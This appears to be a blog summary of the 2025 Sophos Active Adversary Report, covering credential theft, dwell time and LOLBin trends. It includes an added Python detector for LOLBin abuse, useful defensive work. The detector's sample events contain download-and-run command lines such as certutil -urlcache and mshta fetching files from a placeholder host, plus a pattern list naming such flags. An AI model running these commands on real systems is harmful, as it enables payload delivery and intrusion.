2025 Sophos Active Adversary Report by Sophos News

This year marks the fifth anniversary of the Sophos Active Adversary Report. The report originated from a simple question: what happens after attackers breach a company, and how can knowledge of the adversary's tactics help defenders fight active attacks? Originally named "The Active Adversary Playbook," the report evolved into what it is today.

Over the past five years, the report has grown to include data from both the Incident Response (IR) team and the Managed Detection and Response (MDR) team, providing insight into and analysis of the evolving threat landscape. The 2024 dataset is now available for broader discussion and analysis. The data for this report was collected from cases handled in 2024 by both the IR and MDR teams, focusing on organizations with fewer than 1000 employees across various industries.

One key observation from the report is the difference between MDR and IR findings, which highlights the importance of active monitoring for better security outcomes. Compromised credentials remain a leading cause of initial access, underscoring the importance of multi-factor authentication (MFA). Dwell time has decreased: the median dwell time across all cases in 2024 was just two days.

Another notable trend is the rise in attacker abuse of living-off-the-land binaries (LOLBins) and the distinct challenge that remote ransomware poses for actively managed systems. The report also examines the root causes of breaches, with compromised credentials and exploited vulnerabilities remaining the most prevalent.

The report also provides insight into the Tactics, Techniques, and Procedures (TTPs) used by attackers, highlighting the overlap between MDR and IR cases. Abuse of tools like Impacket has increased significantly, while use of Cobalt Strike has decreased. The report also touches on the importance of multi-factor authentication and on the presence of unprotected systems in breached organizations.
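The LOLBin finding above is stated as a trend, not as a detection recipe. As an added illustration of what the MDR-style active monitoring the report credits actually looks like in practice, the following Python snippet is example code written for this page (it is not from Sophos or the report): it scans constructed process-creation events for a few well-known signed Windows binaries and flags them only when their command line carries a pattern that has no place in ordinary administrative use, or when they are spawned by an Office application. The event format, the small rule table and the sample events are all assumptions made for the example.

```python
"""Flag suspicious living-off-the-land binary (LOLBin) use in process-creation events.

Added example for this page; not Sophos code. The CSV layout, the rule table and
the sample events are constructed assumptions.
"""
import csv
import io

# Constructed sample of process-creation events (parent image, child image, command line).
SAMPLE_EVENTS = """parent,image,cmdline
explorer.exe,C:\\Windows\\System32\\notepad.exe,notepad.exe report.txt
winword.exe,C:\\Windows\\System32\\certutil.exe,certutil.exe -urlcache -split -f http://example.invalid/a.dat a.dat
services.exe,C:\\Windows\\System32\\svchost.exe,svchost.exe -k netsvcs
cmd.exe,C:\\Windows\\System32\\mshta.exe,mshta.exe http://example.invalid/x.hta
explorer.exe,C:\\Windows\\System32\\certutil.exe,certutil.exe -verify cert.cer
"""

# Signed Windows binaries that are frequently repurposed, paired with command-line
# fragments that rarely appear in legitimate administration. Deliberately small:
# a real rule set (e.g. Sigma) is far broader and is tuned per environment.
LOLBIN_RULES = {
    "certutil.exe": ("-urlcache", "-decode", "-encode"),
    "mshta.exe": ("http://", "https://", "javascript:", "vbscript:"),
    "regsvr32.exe": ("/i:", "scrobj.dll"),
    "bitsadmin.exe": ("/transfer",),
}

# A LOLBin launched directly by a document-handling application is suspicious
# regardless of its arguments, since users do not normally do that by hand.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def flag_lolbin_abuse(csv_text: str) -> list[dict]:
    """Return one finding per event that matches a LOLBin rule.

    Each finding records the binary, its parent, the reasons it fired and the
    original command line, so an analyst can triage it without re-querying the
    event source.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        image = row["image"].rsplit("\\", 1)[-1].lower()  # strip the directory
        parent = row["parent"].lower()
        cmdline = row["cmdline"].lower()

        patterns = LOLBIN_RULES.get(image)
        if patterns is None:
            continue  # not a binary we track; ordinary processes are skipped

        reasons = [p for p in patterns if p in cmdline]
        if parent in OFFICE_PARENTS:
            reasons.append(f"spawned by Office process {parent}")

        # An untracked-argument run of a tracked binary (e.g. certutil -verify)
        # produces no reasons and is treated as benign administrative use.
        if reasons:
            findings.append(
                {
                    "image": image,
                    "parent": parent,
                    "reasons": reasons,
                    "cmdline": row["cmdline"],
                }
            )
    return findings


if __name__ == "__main__":
    for finding in flag_lolbin_abuse(SAMPLE_EVENTS):
        print(f"{finding['image']} (parent {finding['parent']}): "
              f"{'; '.join(finding['reasons'])}")
```

Run against the constructed events, the benign `certutil -verify` launched from Explorer is left alone while the download-style `certutil` run from Word and the `mshta` run pointed at a URL are both reported. The design point is that the binary alone is never the signal; the argument pattern and the parent process are what separate routine use from the abuse the report describes, which is why this kind of check belongs in continuous monitoring rather than in a one-off audit.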

The report also presents an in-depth case study showing how an organization's internal struggles with business processes shaped a security incident. Its conclusion stresses the importance of letting IT teams focus on security while experts handle the threats, and it acknowledges the contributions of the various teams and individuals involved in the research.

Overall, the Sophos Active Adversary Report offers valuable insight into the evolving threat landscape and the importance of proactive security measures in defending against cyber attacks. The data and methodology behind the report have been carefully curated to preserve confidentiality while still giving organizations meaningful findings with which to bolster their defenses.
